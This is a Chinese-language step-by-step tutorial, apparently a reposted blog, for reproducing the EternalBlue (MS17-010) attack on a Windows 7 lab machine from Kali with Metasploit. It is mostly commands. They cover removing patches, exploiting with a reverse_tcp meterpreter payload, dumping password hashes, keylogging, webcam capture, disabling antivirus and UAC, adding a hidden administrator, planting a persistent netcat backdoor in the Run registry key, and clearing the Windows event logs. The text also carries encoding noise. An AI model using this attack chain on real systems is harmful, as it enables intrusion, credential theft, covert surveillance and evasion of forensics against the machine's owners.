攻擊機(jī): kali Linux?????????? ? 靶機(jī): win7 x64???
提示:? 復(fù)現(xiàn)攻擊前請(qǐng)關(guān)閉殺毒軟件
?文章來源地址http://www.zghlxwxcb.cn/news/detail-404212.html
1.復(fù)現(xiàn)第一步按以下操作打開 445端口: 在 "運(yùn)行" 里輸入: regedit 打開注冊(cè)表編輯器??????????????????????????????????????????????????????????????????????????2. 依次打開目錄: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NetBT\Parameters
3. 在 Parameters 里有一個(gè)類型為 REG_DWORD 名字為 SmbDeviceEnabled 的的項(xiàng)?????????????????
4. 右鍵點(diǎn)擊修改,將它的16進(jìn)制制改為1?????????????????????????????????????????????????????????????????????????????????????????????
?文章來源:http://www.zghlxwxcb.cn/news/detail-404212.html
?
?
?
?
2. 在靶機(jī)打開 ”控制面版----系統(tǒng)和安全----Windows Update(在它下面點(diǎn)擊--查看已安裝的更新),打開后有很多補(bǔ)丁程序,找到用來防止永恒之藍(lán)的補(bǔ)丁并卸載它。我這里是 ( KB4012212 和 KB4499175) 。我已經(jīng)卸載。 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??????????????????????????????????????????????????????? ? ?????? ? ?? ??
?
?
3.? 打開 “控制面版----系統(tǒng)和安全----Windows 防火墻----高級(jí)設(shè)置,在 "入站規(guī)則" 和 "出站規(guī)則" 分別啟用以下規(guī)則。???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????
?
?
?
?
4. 打開 ”網(wǎng)絡(luò)和共享中心----更改高級(jí)共享設(shè)置,開啟以下設(shè)置。????????????????????????????????????????????????????????
?
?
?
5. 在 kali 輸入: nmap -T4 -A -v 192.168.189.181? #靶機(jī)ip地址---進(jìn)行ip端口掃描,圖2顯示靶機(jī)445端口被打開,存在永恒之藍(lán)漏洞。 ? ? ? ? ? ? ? ? ? ? ? ? ? ?? ???????????????????????????????????
?
?
?
6. 打開 msfconsole 框架 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??
?
?
?
7. 輸入 search ms17-010? 查看永恒之藍(lán)漏洞利用模塊??????????????????????????????????????????????????????????????????????
?
?
?
8.? 輸入 use auxiliary/scanner/smb/smb_ms17_010 ? 該模塊用于掃描,嗅探,指紋識(shí)別等相關(guān)功能。 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
?
?
?
9. 輸入? show options ? 查看模塊需要的配置參數(shù) ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??
?
?
?
10. 輸入? set rhosts 192.168.189.181 ? 設(shè)置攻擊目標(biāo)和目標(biāo)和445端口號(hào) ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??
?
?
11. 再次輸入? show options??? 查看配置參數(shù)???????????????????????????????????????????????????????????????????????????????????????????????
?
?
?
12. 輸入? run? 執(zhí)行掃描 ,顯示主機(jī)容易被攻擊 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??
?
?
13. 輸入? use exploit/windows/smb/ms17_010_eternalblue ? 啟動(dòng)ms17-010 攻擊模塊 ? ? ? ? ? ? ? ? ? ? ? ?
?
?
?
14. 輸入 info? 查看這個(gè)漏洞信息 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??
?
?
?
15. 輸入? show targets ?? 顯示該攻擊模塊針對(duì)哪些操作系統(tǒng)、版本有用(可攻擊的平臺(tái))。 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
?
?
?
16.? 輸入? show payloads??? 查看攻擊載荷??????????????????????????????????????????????????????????????????????????????????????????????
?
?
?
17. 輸入? payload/windows/x64/meterpreter/reverse_tcp ? 設(shè)置攻擊載荷 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
?
?
?
19.? 輸入 set rhosts 192.168.189.181、set rport 445? 設(shè)置攻擊目標(biāo)ip和端口號(hào) ????????????????????????????????????????????????????????????????????????????
?
?
?
20. 輸入 set lhost 192.168.189.188、set lport 4444? 設(shè)置監(jiān)聽主機(jī)ip和端口號(hào)(kali)?????????????????????????????????
?
?
?
?
21. 輸入 show options? 查看配置好的攻擊機(jī)和靶機(jī)參數(shù)???????????????????????????????????????????????????????????
?
?
?
22. 輸入? run ? 執(zhí)行攻擊,攻擊成功顯示下圖。成功后可以進(jìn)行文件上傳、獲取截屏、獲取密碼、打開攝像頭拍照、遠(yuǎn)程桌面鏈接、后門持久化等操作。 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
?
?
?
?
23.? 滲透成功后后續(xù)階段: 運(yùn)行run 成功后,開啟了一個(gè)reverse TCP 監(jiān)聽器來監(jiān)聽本地的4444端口( 攻擊者的本地主機(jī)地址 lhost 和端口號(hào) lport)。????????????????????????
@在meterpreter> 中可以使用以下命令來實(shí)現(xiàn)對(duì)目標(biāo)的操作:???
(1).? sysinfo????? 查看目標(biāo)主機(jī)系統(tǒng)信息? ? ? ? ? ? ? ? (2).? run? scraper? ??查看目標(biāo)主機(jī)詳細(xì)信息????????? ? ? (3).? hashdump?????? 導(dǎo)出密碼的哈希??????? ? ? ? ? ? ? ? (4).? load? kiwi???????? 加載??????????????????? ? ? ? ? ? ? ? ? ? (5).? ps??????????????????? 查看目標(biāo)主機(jī)進(jìn)程信息????? ? ? (6).? pwd??????????查看目標(biāo)主機(jī)當(dāng)前目錄(windows)? ? (7).? getlwd????????查看目標(biāo)主機(jī)當(dāng)前目錄(linux)???????? (8).? search? -f? *.jsp? -d? e:\??????? 搜所E盤中以.jsp為后綴的文件???????????????????????????????????????????????????????? (9).? download? e:\test.txt??? /root???將目標(biāo)的e:\test.txt 文件下載到/root 目錄下????????? ? ? ? ? ? ? ? ? (10).?upload?/root/test.txt?d:\test? ? ? 將/root/test.txt 上傳到目標(biāo)機(jī)器的 d:\test 目錄下?????????????????????
(11).? PIDmigrate? 1384????? 將當(dāng)前Meterpreter Shell的進(jìn)程遷移到PID為1384的進(jìn)程上??????????????? ?(12).? idletime????? 查看主機(jī)運(yùn)行時(shí)間????????????????? ? (13).? getuid???????? 查看獲取到的當(dāng)前權(quán)限? ? ? ? ?(14).? getsystem????? 提權(quán)?????????????????? ? ? ? ? ? ? ? ? ? ? ?(15).? run? killav?????? 關(guān)閉殺毒軟件??????????????? ? ? ? ? ?(16).? screenshot????? 截圖?????????????????????????? ? ? ? ? ? ? (17).? webcam_list?????查看目標(biāo)主機(jī)的攝像頭????????? (18).? webcam_snap????? 拍照???????????????????? ? ? ? ? ? ? (19).? webcam_stream????? 開視頻? ? ? ? ? ? ? ? ? ? (20).? execute? 參數(shù)? -f? 可執(zhí)行文件? ?執(zhí)行可執(zhí)行程序??? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??(21).? run? getgui? -u? hack? -p? 123? ? ? ? ? ? ? ? ? ? 創(chuàng)建hack用戶,密碼為123????????????????????????????????? ? ? (22).? run? getgui? -e????開啟遠(yuǎn)程桌面鏈接? ? ? ?(23).? keyscan_start????? 開啟鍵盤記錄功能? ? ? (24).? keyscan_dump???顯示捕捉到的鍵盤記錄信息(25).? keyscan_stop?????停止鍵盤記錄功能????????? (26).? uictl? disable? keyboard????禁止目標(biāo)使用鍵盤(27).? uictl? enable? keyboard ? ? 允許目標(biāo)使用鍵盤 (28).? uictl? disable? mouse ? ? ? ?禁止目標(biāo)使用鼠標(biāo) (29).? uictl? enable?? mouse ? ? ? ?允許目標(biāo)使用鼠標(biāo) (30).? load? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?使用擴(kuò)展庫? ? ? ? (31).? run ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ???執(zhí)行攻擊 ? ? ? ? ? (32).? clearev ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?清除日志 ? ? ? ?????
?
?
?
24.?? 示例: 輸入 sysinfo? 查看目標(biāo)主機(jī)系統(tǒng)???????????????????????????????????????????????????????????????????????????????????????
? ? ?
?
?
?
25. 示例:輸入 ipconfig? 查看主機(jī)ip????????????????????? ? ??????????????????????????????????????????????????????????????????????????
?
?
?
26.? 示例: 輸入 getuid? 查看用戶身份(windows 系統(tǒng)權(quán)限) ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
?
?
?
27. ? 示例: 輸入 shell? 獲得shell控制臺(tái)????????????????????????????????????????????????????????????????????????????????????????????
?
?
?
28.? 想要從目標(biāo)主機(jī)shell 退出到 meterpreter,輸入 exit? 退出shell。?????????????????????????????????????????????????
?
?
?
29. 示例: 輸入 screenshot? 獲取靶機(jī)截屏 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??
?
?
?
?
30. 以下模塊主要用于在獲得目標(biāo)主機(jī)系統(tǒng)遠(yuǎn)程控制權(quán)后,進(jìn)行一系列后滲透攻擊
(1).? run post/windows/manage/migrate????? 自動(dòng)進(jìn)程遷移????????????????????????? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? (2).? run post/windows/gather/checkvm?????? 查看靶機(jī)是否運(yùn)行在虛擬機(jī)上??????????????????????????????????????? (3).? run post/windows/manage/killav????????? 關(guān)閉殺毒軟件????????????????????????????????????? ? ? ? ? ? ? ? ? ? ? ? ? ? ?(4).? run post/windows/manage/enable_rdp??????? 開啟遠(yuǎn)程桌面服務(wù)?????????????????????????????????????????????????? (5).? run post/windows/manage/autoroute?????????? 查看路由信息????????????????????????????????????????????????????????? (6).?run post/windows/gather/enum_logged_on_users?????列舉當(dāng)前登錄的用戶?? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? (7).? run post/windows/gather/enum_applications?????? 列舉應(yīng)用程序? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ???? (8).? run windows/gather/credentials/windows_autologin抓取自動(dòng)登錄的用戶名和密碼? ? ? ? ? ? ? ? ? ? ? ? ? ?(9).? run windows/gather/smart_hashdump??????? dump出所由用戶的hash
?
?
?
31. 示例: 輸入? hashdump 或 run windows/gather/smart_hashdump ?? 獲取用戶密碼?? ? ? ? ? ? ? ? ? ?? ?????????????????
?
?
32.? 將得到的哈希碼放到MD5在線破解上解密得到明文密碼 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
?
?
?
33.? 輸入? shell? 進(jìn)入shell控制臺(tái)?????????????????????????????????????????????????????????????????????????????????????????????????????????????
?
?
34.? 輸入?? net user hackk 123456 add??? 在靶機(jī)上創(chuàng)建一個(gè)名為hackk的用戶,密碼為123456??????????
?
?
?
35. 輸入? net? localgroup? administrators? hackk? /add??? 將hackk添加到Windows 7的本地管理員組中,以便獲得更大的權(quán)限。?????????????????????????????
?
?
?
?
36. 輸入? net? user ?? 查看本地用戶 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??
?
?
?
37. 輸入? net? localgroup? administrators ?? 查看本地管理員 ,可以看到hackk已被添加進(jìn)管理員組中? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??
?
?
?
38. 輸入? run getgui -e? 或? run post/windows/manage/enable_rdp??? 開啟靶機(jī)遠(yuǎn)程桌面鏈接????????????
?
?
?
39.? 在kali 輸入? rdesktop? 192.168.189.188???靶機(jī)ip地址,就可打開遠(yuǎn)程桌面?????? ??????????????????????
?
?
?
?
40.? 輸入? hashdump? 查看用戶密碼?????????????????????
?
?
?
41. 輸入? netsh firewall add portopening TCP 4444 "hackk"? ENABLE ALL ?? 創(chuàng)建防火墻規(guī)則 ? ? ? ?
?
?
?
42. 輸入? netsh firewall add portopening TCP 443? "hackk"? ENABLE ALL??? 新建一條防火墻規(guī)則,允許443端口訪問網(wǎng)絡(luò)???????????????????????? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??
?
?
?
43. 輸入????cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 關(guān)閉UAC,以達(dá)到阻止未經(jīng)用戶授權(quán)的程序啟動(dòng)破壞系統(tǒng)??????????????????????????????????????????????????????????????????
?
?
?
44. 輸入?? cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 開啟默認(rèn)共享,方便攻擊者執(zhí)行遠(yuǎn)程命令 ?
?
?
?
45. 在kali 輸入? ls /usr/share/windows-binaries/nc.exe???? 查看nc反彈后門程序在kali里的路徑 ????????????????????????????????????
?
?
?
46. 輸入? upload /usr/share/windows-binaries/nc.exe? C:\\Windows? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 上傳nc到靶機(jī)C盤windows文件夾中,打開靶機(jī)可以看到從kali上傳到win7的nc程序?????
?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????
?
?
?
47. 輸入? reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\Windows\nc.exe -Ldp 443 -e cmd.exe'? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?當(dāng)靶機(jī)開機(jī)后,允許443端口訪問網(wǎng)絡(luò)。(用于連接nc的端口)??????????????????????????????????????? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??
?
?
?
48. 輸入? run? post/windows/manage/enable_rdp? ? ? ? ? ? ? ? ? ? 開啟目標(biāo)遠(yuǎn)程桌面鏈接 ,然后在kali輸入?
rdesktop 192.168.189.188? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? (靶機(jī)ip) 鏈接遠(yuǎn)程桌面,并重啟靶機(jī)?????????????????????? ? ? ? ? ? ? ? ? ? ??
?
?
?
49. 在kali 輸入? nc -v 192.168.189.188 443?????? 就可以通過nc連接靶機(jī)進(jìn)入控制臺(tái)
? ?
?
?
?
50.? 向反彈到kali的靶機(jī)控制臺(tái)輸入?? wevtutil cl security???? 清除登錄日志??????????????????????????????????????????????????
?
?
?
52.? 向反彈到kali的靶機(jī)控制臺(tái)輸入?? wevtutil cl system ??? 清除系統(tǒng)日志????? ? ? ? ??
?
?
?
53.? 向反彈到kali的靶機(jī)控制臺(tái)輸入? wevtutil cl application? 清除應(yīng)用程序日志??
?
?
?
55. 靶機(jī)日制被清空,滲透完成? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
到了這里,關(guān)于永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!